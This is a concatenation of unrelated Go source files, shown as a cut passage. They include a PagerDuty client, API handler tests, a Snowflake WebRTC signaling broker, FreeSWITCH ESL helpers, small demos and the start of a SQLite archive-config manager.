	apiClient *pagerduty.Client
}
// ScheduleInfo summarizes one PagerDuty schedule over a time window.
type ScheduleInfo struct {
	ID            string
	Name          string
	Location      *time.Location // schedule's time zone
	Start         time.Time
	End           time.Time
	FinalSchedule pagerduty.ScheduleLayer
}
// UserRotaPeriod is one contiguous on-call span for a user.
type UserRotaPeriod struct {
	Start time.Time
	End   time.Time
}

// UserRotaInfo collects a user's identity and all of their on-call spans.
type UserRotaInfo struct {
	ID      string
	Name    string
	Periods []*UserRotaPeriod
}

// ScheduleUserRotationData maps a user ID to that user's rotation info.
type ScheduleUserRotationData map[string]*UserRotaInfo
func InitialisePagerDutyAPIClient(authToken string) {
Client = &PagerDutyClient{
apiClient: pagerduty.NewClient(authToken),
}
}
// ListSchedules pages through the PagerDuty API and returns every
// schedule.
//
// Fix: the original set opts.Offset = resp.Limit on every page, so the
// offset never advanced past one page-length — with more than two pages
// of schedules it refetched the same page forever. The offset must
// accumulate.
func (p *PagerDutyClient) ListSchedules() ([]pagerduty.Schedule, error) {
	var schedules []pagerduty.Schedule
	var opts pagerduty.ListSchedulesOptions
	for more := true; more; {
		resp, err := p.apiClient.ListSchedules(opts)
		if err != nil {
			return nil, err
		}
		schedules = append(schedules, resp.Schedules...)
		more = resp.More
		opts.Offset += resp.Limit
	}
	return schedules, nil
}
// ListServices returns the services belonging to the given team.
func (p *PagerDutyClient) ListServices(teamID string) ([]pagerduty.Service, error) {
	opts := pagerduty.ListServiceOptions{TeamIDs: []string{teamID}}
	resp, err := p.apiClient.ListServices(opts)
	if err != nil {
		return nil, err
	}
	return resp.Services, nil
}
// ListTeams returns the first page of teams with default options.
func (p *PagerDutyClient) ListTeams() ([]pagerduty.Team, error) {
	resp, err := p.apiClient.ListTeams(pagerduty.ListTeamOptions{})
	if err != nil {
		return nil, err
	}
	return resp.Teams, nil
}
// ListUsers returns the first page of users with default options.
func (p *PagerDutyClient) ListUsers() ([]pagerduty.User, error) {
	resp, err := p.apiClient.ListUsers(pagerduty.ListUsersOptions{})
	if err != nil {
		return nil, err
	}
	return resp.Users, nil
}
// GetUserById fetches a single user by ID with default options.
func (p *PagerDutyClient) GetUserById(id string) (*pagerduty.User, error) {
	var opts pagerduty.GetUserOptions
	return p.apiClient.GetUser(id, opts)
}
// GetSchedule fetches one schedule restricted to the [startDate,
// endDate] window (API date strings are passed through untouched).
func (p *PagerDutyClient) GetSchedule(scheduleID, startDate, endDate string) (*pagerduty.Schedule, error) {
	opts := pagerduty.GetScheduleOptions{Since: startDate, Until: endDate}
	resp, err := p.apiClient.GetSchedule(scheduleID, opts)
	if err != nil {
		return nil, err
	}
	return resp, nil
}
|
package main
type PatientHistory struct {
PatientId string `json:"PatientId"`
MedicalRecords []MedicalRecord `json:"MedicalRecords"`
}
|
package rest_api
import (
"bytes"
"context"
"errors"
"github.com/go-chi/chi"
"github.com/stretchr/testify/mock"
"github.com/stretchr/testify/require"
"go-friend-mgmt/cmd/internal/services/mocks"
"go-friend-mgmt/cmd/internal/services/models"
"net/http"
"net/http/httptest"
"testing"
)
// TestCreateConnectionFriend exercises the CreateConnectionFriend
// handler for a successful request, a service-layer failure, and a
// malformed request body.
//
// Fix: the original set headers on req before checking the error from
// http.NewRequest — a nil req would panic before require.NoError ran.
// Code is also gofmt-formatted.
func TestCreateConnectionFriend(t *testing.T) {
	var jsonStr = []byte(`{"friends":["andy@example","john@example.com"]}`)
	var jsonStr2 = []byte(`{"friends":[andy@example]}`) // deliberately invalid JSON
	testCase := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockresponse models.Response
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockresponse: models.Response{
				Success: true,
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true}\n",
		},
		{
			name:        "create failed by CreateConnectionFriend error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockresponse: models.Response{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCase {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/makefriend", tt.bodyRequest)
			require.NoError(t, err) // check before touching req
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("CreateConnectionFriend", mock.Anything, mock.Anything).Return(tt.mockresponse, tt.mockError)
			handler := CreateConnectionFriend(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
// TestReceiveFriendListByEmail verifies the ReceiveFriendListByEmail handler
// for success, service-layer failure, and a malformed JSON payload.
func TestReceiveFriendListByEmail(t *testing.T) {
	var jsonStr = []byte(`{"email":"andy@example"}`)
	var jsonStr2 = []byte(`{"email":andy@example}`) // deliberately invalid JSON
	testCases := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockResponse models.ResponseFriend
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.ResponseFriend{
				Success: true,
				Friends: []string{"andy@gmail.com", "david@gmail.com"},
				Count:   2,
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true,\"friends\":[\"andy@gmail.com\",\"david@gmail.com\"],\"count\":2}\n",
		},
		{
			name:        "create failed by ReceiveFriendListByEmail error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.ResponseFriend{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCases {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/friends", tt.bodyRequest)
			// Check the error before touching req: a non-nil err leaves req nil.
			require.NoError(t, err)
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("ReceiveFriendListByEmail", mock.Anything, mock.Anything).Return(tt.mockResponse, tt.mockError)
			handler := ReceiveFriendListByEmail(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
// TestReceiveCommonFriendList verifies the ReceiveCommonFriendList handler
// for success, service-layer failure, and a malformed JSON payload.
func TestReceiveCommonFriendList(t *testing.T) {
	var jsonStr = []byte(`{"friends":["andy@example","john@example.com"]}`)
	var jsonStr2 = []byte(`{"friends":[andy@example,"john@example.com"]}`) // deliberately invalid JSON
	testCases := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockResponse models.ResponseFriend
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.ResponseFriend{
				Success: true,
				Friends: []string{"andy@gmail.com", "david@gmail.com"},
				Count:   2,
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true,\"friends\":[\"andy@gmail.com\",\"david@gmail.com\"],\"count\":2}\n",
		},
		{
			name:        "create failed by ReceiveCommonFriendList error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.ResponseFriend{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCases {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/commonfriends", tt.bodyRequest)
			// Check the error before touching req: a non-nil err leaves req nil.
			require.NoError(t, err)
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("ReceiveCommonFriendList", mock.Anything, mock.Anything).Return(tt.mockResponse, tt.mockError)
			handler := ReceiveCommonFriendList(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
// TestSubscribeUpdateFromEmail verifies the SubscribeUpdateFromEmail handler
// for success, service-layer failure, and a malformed JSON payload.
func TestSubscribeUpdateFromEmail(t *testing.T) {
	var jsonStr = []byte(`{"requestor":"andy@example","target":"john@example"}`)
	var jsonStr2 = []byte(`{"requestor":andy@example,"target":"john@example"}`) // deliberately invalid JSON
	testCases := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockResponse models.Response
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.Response{
				Success: true,
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true}\n",
		},
		{
			name:        "create failed by SubscribeUpdateFromEmail error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.Response{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCases {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/subscribe", tt.bodyRequest)
			// Check the error before touching req: a non-nil err leaves req nil.
			require.NoError(t, err)
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("SubscribeUpdateFromEmail", mock.Anything, mock.Anything).Return(tt.mockResponse, tt.mockError)
			handler := SubscribeUpdateFromEmail(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
// TestBlockUpdateFromEmail verifies the BlockUpdateFromEmail handler
// for success, service-layer failure, and a malformed JSON payload.
func TestBlockUpdateFromEmail(t *testing.T) {
	var jsonStr = []byte(`{"requestor":"andy@example","target":"john@example"}`)
	var jsonStr2 = []byte(`{"requestor":andy@example,"target":"john@example"}`) // deliberately invalid JSON
	testCases := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockResponse models.Response
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.Response{
				Success: true,
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true}\n",
		},
		{
			// Name fixed: this case exercises BlockUpdateFromEmail, not
			// SubscribeUpdateFromEmail (copy-paste slip).
			name:        "create failed by BlockUpdateFromEmail error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.Response{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCases {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/block", tt.bodyRequest)
			// Check the error before touching req: a non-nil err leaves req nil.
			require.NoError(t, err)
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("BlockUpdateFromEmail", mock.Anything, mock.Anything).Return(tt.mockResponse, tt.mockError)
			handler := BlockUpdateFromEmail(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
// TestGetAllSubscribeUpdateByEmail verifies the GetAllSubscribeUpdateByEmail
// handler for success, service-layer failure, and a malformed JSON payload.
func TestGetAllSubscribeUpdateByEmail(t *testing.T) {
	var jsonStr = []byte(`{"sender":"andy@example","text":"Hello World! kate@example.com"}`)
	var jsonStr2 = []byte(`{"sender":andy@example,"text":"Hello World! kate@example.com"}`) // deliberately invalid JSON
	testCases := []struct {
		name         string
		bodyRequest  *bytes.Buffer
		expectedCode int
		expectedBody string
		mockResponse models.SubscribeResponse
		mockError    error
	}{
		{
			name:        "success",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.SubscribeResponse{
				Success:    true,
				Recipients: []string{"andy@example", "kate@example.com"},
			},
			expectedCode: 200,
			expectedBody: "{\"success\":true,\"recipients\":[\"andy@example\",\"kate@example.com\"]}\n",
		},
		{
			// Name fixed: this case exercises GetAllSubscribeUpdateByEmail
			// (copy-paste slip said SubscribeUpdateFromEmail).
			name:        "create failed by GetAllSubscribeUpdateByEmail error",
			bodyRequest: bytes.NewBuffer(jsonStr),
			mockResponse: models.SubscribeResponse{
				Success: false,
			},
			mockError:    errors.New("db error"),
			expectedCode: 500,
			expectedBody: "{\"statusCode\":500,\"message\":\"db error\"}\n",
		},
		{
			name:         "retrieve failed by incorrect input",
			bodyRequest:  bytes.NewBuffer(jsonStr2),
			expectedCode: 400,
			expectedBody: "{\"statusCode\":400,\"message\":\"Bad request\"}\n",
		},
	}
	for _, tt := range testCases {
		t.Run(tt.name, func(t *testing.T) {
			req, err := http.NewRequest(http.MethodPost, "/user/emailssubscribe", tt.bodyRequest)
			// Check the error before touching req: a non-nil err leaves req nil.
			require.NoError(t, err)
			req.Header.Set("X-Custom-Header", "myvalue")
			req.Header.Set("Content-Type", "application/json")
			router := chi.NewRouter()
			req = req.WithContext(context.WithValue(req.Context(), chi.RouteCtxKey, router))
			rr := httptest.NewRecorder()
			serviceMock := new(mocks.ServiceMock)
			serviceMock.On("GetAllSubscribeUpdateByEmail", mock.Anything, mock.Anything).Return(tt.mockResponse, tt.mockError)
			handler := GetAllSubscribeUpdateByEmail(serviceMock)
			handler.ServeHTTP(rr, req)
			require.Equal(t, tt.expectedCode, rr.Code)
			require.Equal(t, tt.expectedBody, rr.Body.String())
		})
	}
}
|
package test
import (
"testing"
)
// TestDes is a scratch test kept from encryption experiments; every
// exploratory statement is commented out, so the test is currently a no-op.
// The unused `key` declaration is commented out as well: an unused local
// variable is a compile error in Go.
func TestDes(t *testing.T) {
	// key := []byte("LKHlhb899Y09olUi")
	// encryptMsg, err := encrypt(key, "Hello World")
	// if err != nil {
	// 	t.Error(err)
	// } else {
	// 	fmt.Println(encryptMsg)
	// }
	// msg, _ := decrypt(key, encryptMsg)
	// fmt.Println(msg) // Hello World
	// s := 6300
	// i64, _ := strconv.ParseInt(strconv.Itoa(s), 10, 64)
	// fmt.Print(i64)
}
// $2a$10$o69KkDrtSuM9ER1QLv3CO.Wd0DwPxWUsekUO1.jnxhFau/8D7OYbi
// $2a$10$KpCqOj7ao1SpHHMXkqvk.uA30HyodcinAsJuXcenIkwOg67QAuBcC |
package main
import "fmt"
// main runs the three small control-flow demos below.
func main() {
	/*
		Examples of if and if/else.
		exampleIf prints "Hi" when its number is at most 5 (the code uses <=),
		otherwise "Bye".
	*/
	exampleIf()
	exampleIfElse()
	oddEven() // --> checks number is even or odd
}
// exampleIf prints "Hi" for its sample number when it is at most 5,
// and "Bye" otherwise.
func exampleIf() {
	const number = 4
	if number > 5 {
		fmt.Println("Bye")
	} else {
		fmt.Println("Hi")
	}
}
// exampleIfElse demonstrates multi-way branching; with the sample value 1
// it prints "ONE".
func exampleIfElse() {
	number := 1
	switch number {
	case 1:
		fmt.Println("ONE")
	case 2:
		fmt.Println("TWO")
	default:
		fmt.Println("default else")
	}
}
// oddEven reports the parity of its sample number on stdout.
func oddEven() {
	num := 11
	if num%2 != 0 {
		fmt.Println("Odd")
	} else {
		fmt.Println("Even")
	}
}
|
package main
import (
"os"
"path/filepath"
"syscall"
"github.com/fd/forklift/util/user"
)
// user_exec replaces the current process with the per-user forklift binary
// at ~/.forklift/bin/forklift when it exists and is not already the binary
// being run. All failures are silently ignored so the caller simply
// continues in the current process.
func user_exec() {
	home, err := user.Home()
	if err != nil {
		return
	}
	path := filepath.Join(home, ".forklift", "bin", "forklift")
	_, err = os.Stat(path)
	if err != nil {
		// No user-local binary installed.
		return
	}
	// Already running the user-local binary; avoid an exec loop.
	if os.Args[0] == path {
		return
	}
	os.Args[0] = path
	// On success Exec never returns; its error is deliberately dropped —
	// this is a best-effort hand-off.
	syscall.Exec(path, os.Args, os.Environ())
}
|
/*
Broker acts as the HTTP signaling channel.
It matches clients and snowflake proxies by passing corresponding
SessionDescriptions in order to negotiate a WebRTC connection.
TODO(serene): This code is currently the absolute minimum required to
cause a successful negotiation.
It's otherwise very unsafe and problematic, and needs quite some work...
*/
package snowflake_broker
import (
"container/heap"
"io/ioutil"
"log"
"net"
"net/http"
"time"
)
const (
ClientTimeout = 10
ProxyTimeout = 10
)
// This is minimum viable client-proxy registration.
// TODO(#13): better, more secure registration corresponding to what's in
// the python flashproxy facilitator.
var snowflakes *SnowflakeHeap
// Map keeping track of snowflakeIDs required to match SDP answers from
// the second http POST.
var snowflakeMap map[string]*Snowflake
// Create and add a Snowflake to the heap.
func AddSnowflake(id string) *Snowflake {
snowflake := new(Snowflake)
snowflake.id = id
snowflake.clients = 0
snowflake.offerChannel = make(chan []byte)
snowflake.answerChannel = make(chan []byte)
heap.Push(snowflakes, snowflake)
snowflakeMap[id] = snowflake
return snowflake
}
// robotsTxtHandler serves a permissive robots.txt (allow everything).
func robotsTxtHandler(w http.ResponseWriter, r *http.Request) {
	const robots = "User-agent: *\nDisallow:\n"
	w.Header().Set("Content-Type", "text/plain; charset=utf-8")
	w.Write([]byte(robots))
}
// ipHandler echoes the requester's IP address as plain text.
// http.Request.RemoteAddr has the form "IP:port", so the port must be
// stripped before net.ParseIP can succeed; the old code passed the full
// "IP:port" string to ParseIP, which always failed.
func ipHandler(w http.ResponseWriter, r *http.Request) {
	remoteAddr := r.RemoteAddr
	if host, _, err := net.SplitHostPort(remoteAddr); err == nil {
		remoteAddr = host
	}
	// Bracket non-IPv4 literals (i.e. IPv6), matching URL host notation.
	if net.ParseIP(remoteAddr).To4() == nil {
		remoteAddr = "[" + remoteAddr + "]"
	}
	w.Header().Set("Content-Type", "text/plain; charset=utf-8")
	w.Write([]byte(remoteAddr))
}
// isPreflight sets the CORS headers on every response and reports whether
// the request is an OPTIONS preflight that should be answered immediately.
func isPreflight(w http.ResponseWriter, r *http.Request) bool {
	h := w.Header()
	h.Set("Access-Control-Allow-Origin", "*")
	h.Set("Access-Control-Allow-Headers", "Origin, X-Session-ID")
	return r.Method == "OPTIONS"
}
/*
Expects a WebRTC SDP offer in the Request to give to an assigned
snowflake proxy, which responds with the SDP answer to be sent in
the HTTP response back to the client.
*/
func clientHandler(w http.ResponseWriter, r *http.Request) {
	offer, err := ioutil.ReadAll(r.Body)
	if nil != err {
		log.Println("Invalid data.")
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	w.Header().Set("Access-Control-Allow-Origin", "*")
	w.Header().Set("Access-Control-Allow-Headers", "X-Session-ID")
	// heap.Pop panics on an empty heap, so the old nil-check *after* the
	// pop could never fire; guard the heap length up front instead.
	if snowflakes.Len() <= 0 {
		w.WriteHeader(http.StatusServiceUnavailable)
		return
	}
	// Find the most available snowflake proxy, and pass the offer to it.
	snowflake := heap.Pop(snowflakes).(*Snowflake)
	snowflake.offerChannel <- offer
	// Wait for the answer to be returned on the channel.
	select {
	case answer := <-snowflake.answerChannel:
		log.Println("Retrieving answer")
		w.Write(answer)
		// Only remove from the snowflake map once the answer is set.
		delete(snowflakeMap, snowflake.id)
	case <-time.After(time.Second * ClientTimeout):
		w.WriteHeader(http.StatusGatewayTimeout)
		w.Write([]byte("timed out waiting for answer!"))
	}
}
/*
For snowflake proxies to request a client from the Broker.
*/
func proxyHandler(w http.ResponseWriter, r *http.Request) {
	if isPreflight(w, r) {
		return
	}
	id := r.Header.Get("X-Session-ID")
	body, err := ioutil.ReadAll(r.Body)
	if nil != err {
		log.Println("Invalid data.")
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	// The body must confirm the X-Session-ID header.
	if string(body) != id { // Mismatched IDs!
		w.WriteHeader(http.StatusBadRequest)
		// BUG FIX: previously execution fell through and registered the
		// snowflake anyway despite the 400.
		return
	}
	log.Println("Received snowflake: ", id)
	snowflake := AddSnowflake(id)
	// Wait for a client to avail an offer to the snowflake, or timeout
	// and ask the snowflake to poll later.
	select {
	case offer := <-snowflake.offerChannel:
		log.Println("Passing client offer to snowflake.")
		w.Write(offer)
	case <-time.After(time.Second * ProxyTimeout):
		// This snowflake is no longer available to serve clients.
		heap.Remove(snowflakes, snowflake.index)
		delete(snowflakeMap, snowflake.id)
		w.WriteHeader(http.StatusGatewayTimeout)
	}
}
/*
Expects snowflake proxes which have previously successfully received
an offer from proxyHandler to respond with an answer in an HTTP POST,
which the broker will pass back to the original client.
*/
func answerHandler(w http.ResponseWriter, r *http.Request) {
	if isPreflight(w, r) {
		return
	}
	id := r.Header.Get("X-Session-ID")
	snowflake, ok := snowflakeMap[id]
	if !ok || nil == snowflake {
		// The snowflake took too long to respond with an answer,
		// and the designated client is no longer around / recognized by the Broker.
		w.WriteHeader(http.StatusGone)
		return
	}
	body, err := ioutil.ReadAll(r.Body)
	if nil != err {
		log.Println("Invalid data.")
		w.WriteHeader(http.StatusBadRequest)
		return
	}
	// Log the answer as text rather than a raw []byte number dump.
	log.Println("Received answer: ", string(body))
	// answerChannel is unbuffered: if the waiting client already timed out,
	// a plain send would block this handler forever. Give up after the same
	// window the client waits.
	select {
	case snowflake.answerChannel <- body:
	case <-time.After(time.Second * ClientTimeout):
		w.WriteHeader(http.StatusGone)
	}
}
// init sets up the broker's global state (snowflake heap and session map)
// and registers all HTTP routes on the default ServeMux.
func init() {
	snowflakes = new(SnowflakeHeap)
	snowflakeMap = make(map[string]*Snowflake)
	heap.Init(snowflakes)
	http.HandleFunc("/robots.txt", robotsTxtHandler)
	http.HandleFunc("/ip", ipHandler)
	http.HandleFunc("/client", clientHandler)
	http.HandleFunc("/proxy", proxyHandler)
	http.HandleFunc("/answer", answerHandler)
}
|
// Copyright 2015 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// #nosec G404
package ddltest
import (
"math/rand"
)
// randomInt returns a non-negative pseudo-random int from the shared source.
func randomInt() int {
	return rand.Int()
}
// randomIntn returns a pseudo-random int in [0, n); panics if n <= 0
// (rand.Intn's contract).
func randomIntn(n int) int {
	return rand.Intn(n)
}
// randomFloat returns a pseudo-random float64 in [0.0, 1.0).
func randomFloat() float64 {
	return rand.Float64()
}
// randomString returns a pseudo-random alphanumeric string of length n.
func randomString(n int) string {
	const alphanum = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
	buf := make([]byte, n)
	for i := 0; i < n; i++ {
		buf[i] = alphanum[rand.Intn(len(alphanum))]
	}
	return string(buf)
}
// Args
//	0 -> min
//	1 -> max
// randomNum(1,10) -> [1,10)
// randomNum(-1)   -> random (panics: rand.Intn requires n > 0)
// randomNum()     -> random non-negative int
func randomNum(args ...int) int {
	switch len(args) {
	case 0:
		return rand.Int()
	case 1:
		return rand.Intn(args[0])
	default:
		return args[0] + rand.Intn(args[1]-args[0])
	}
}
|
// Copyright 2015 Nevio Vesic
// Please check out LICENSE file for more information about what you CAN and what you CANNOT do!
// Basically in short this is a free software for you to do whatever you want to do BUT copyright must be included!
// I didn't write all of this code so you could say it's yours.
// MIT License
package goesl
import "context"
// ExecuteSet - Helper that you can use to execute the SET application
// against the active ESL session, setting key=value.
func (sc *SocketConnection) ExecuteSet(ctx context.Context, key string, value string, sync bool) (m *Message, err error) {
	return sc.Execute(ctx, "set", key+"="+value, sync)
}
// ExecuteAnswer - Helper designed to help with executing Answer against the
// active ESL session. (Comment previously misnamed this ExecuteHangup.)
func (sc *SocketConnection) ExecuteAnswer(ctx context.Context, args string, sync bool) (m *Message, err error) {
	return sc.Execute(ctx, "answer", args, sync)
}
// ExecuteHangup - Helper designed to help with executing Hangup against the
// active ESL session. A non-empty uuid targets that specific call leg via
// ExecuteUUID; otherwise the session's current channel is hung up.
func (sc *SocketConnection) ExecuteHangup(ctx context.Context, uuid string, args string, sync bool) (m *Message, err error) {
	if uuid != "" {
		return sc.ExecuteUUID(ctx, uuid, "hangup", args, sync)
	}
	return sc.Execute(ctx, "hangup", args, sync)
}
// Api - Helper designed to attach "api " in front of the command so that you
// do not need to write it. (Comment previously misnamed this BgApi.)
func (sc *SocketConnection) Api(ctx context.Context, command string) error {
	return sc.Send(ctx, "api "+command)
}
// BgApi - Helper designed to attach "bgapi " in front of the command so that
// you do not need to write it.
func (sc *SocketConnection) BgApi(ctx context.Context, command string) error {
	return sc.Send(ctx, "bgapi "+command)
}
// Connect - Helper designed to help you handle connection. Each outbound server when handling needs to connect e.g. accept
// connection in order for you to do answer, hangup or do whatever else you wish to do
func (sc *SocketConnection) Connect(ctx context.Context) error {
	return sc.Send(ctx, "connect")
}
// Exit - Used to send exit signal to ESL. It will basically hangup call and close connection
func (sc *SocketConnection) Exit(ctx context.Context) error {
	return sc.Send(ctx, "exit")
}
|
package main
import (
"math"
"sort"
)
// threeSumClosest returns the sum of the three elements of nums whose sum is
// closest to target (exactly target when possible). nums is sorted in place.
// Two-pointer sweep per anchor index: O(n^2) time, O(1) extra space.
func threeSumClosest(nums []int, target int) int {
	sort.Ints(nums)
	n := len(nums)
	best := 0
	bestDiff := math.MaxInt32
	for i := 0; i < n-2; i++ {
		lo, hi := i+1, n-1
		for lo < hi {
			sum := nums[i] + nums[lo] + nums[hi]
			diff := sum - target
			if diff < 0 {
				diff = -diff
			}
			// An exact hit cannot be improved upon.
			if diff == 0 {
				return sum
			}
			if diff < bestDiff {
				best, bestDiff = sum, diff
			}
			if sum < target {
				lo++
			} else {
				hi--
			}
		}
	}
	return best
}
// abs returns the absolute difference |a - b|.
func abs(a, b int) int {
	if a < b {
		return b - a
	}
	return a - b
}
|
package main
import (
"database/sql"
"fmt"
"strings"
"time"
"github.com/gtfierro/xboswave/ingester/types"
"github.com/immesys/wavemq/mqpb"
_ "github.com/mattn/go-sqlite3"
)
// these are addressable true/false values used internally for the RequestFilter
// (struct fields are *bool, and Go cannot take the address of a literal).
var _FALSE = false
var _TRUE = true

// ArchiveRequest describes one archival subscription: which message schema,
// which extraction plugin, and which WAVEMQ URI to subscribe to, plus the
// bookkeeping columns mirrored from the `requests` table.
type ArchiveRequest struct {
	// message schema this request applies to
	// (this is a field in the WAVEMQ wrapper)
	Schema string
	// path to the plugin to use to extract
	// timeseries data (e.g. plugins/dent.so)
	// Path should end in .so
	Plugin string
	// the URI we subscribe to
	URI types.SubscriptionURI
	// time this archive request was created
	Inserted time.Time
	// the text of the last error this archive request experienced
	LastError string
	// what time that error occured
	ErrorTimestamp time.Time
	// whether or not this archive request is active
	Enabled bool
	// unique identifier (database primary key)
	Id int
}

// subscription bundles a live WAVEMQ subscribe stream with its stop signal
// and reconnect backoff timer.
type subscription struct {
	S     mqpb.WAVEMQ_SubscribeClient
	stop  chan struct{}
	uri   types.SubscriptionURI
	timer *ExponentialBackoff
}

// ConfigManager persists archive requests in a SQLite database.
type ConfigManager struct {
	db *sql.DB
}
// NewCfgManager opens (or creates) the SQLite store at cfg.Store.Path and
// ensures the `requests` table exists. Note: on table-creation failure the
// (partially initialized) manager is returned alongside the error.
func NewCfgManager(cfg *Config) (*ConfigManager, error) {
	var err error
	cfgmgr := &ConfigManager{}
	cfgmgr.db, err = sql.Open("sqlite3", cfg.Store.Path)
	if err != nil {
		return nil, err
	}
	// set up tables
	_, err = cfgmgr.db.Exec(`CREATE TABLE IF NOT EXISTS requests (
	id INTEGER PRIMARY KEY,
	schema TEXT NOT NULL,
	plugin TEXT NOT NULL,
